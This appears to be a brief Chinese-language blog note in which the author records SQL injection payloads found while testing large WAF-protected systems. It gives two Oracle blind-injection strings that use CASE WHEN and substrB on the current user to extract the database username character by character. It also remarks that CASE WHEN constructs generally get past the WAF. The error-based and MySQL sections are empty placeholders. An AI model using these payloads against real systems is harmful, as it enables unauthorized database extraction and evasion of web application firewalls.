Oracle
⠀⠀最近有机会接触到大型系统,与WAF斗智斗勇,基本都是Oracle盲注,挖了几个SQL注入的漏洞还是记录一下,所以写个文章长期记录。
盲注
zhangwe'||case+when+substrB(user,1,1)='W'+then'i'else'xx'end||
%CE%CA%CC%E2'and case when substrB(user,5,1)='3' then 'd' end like'd
⠀⠀case when语句基本能过WAF
报错注入
⠀⠀等待更新
Mysql
等待更新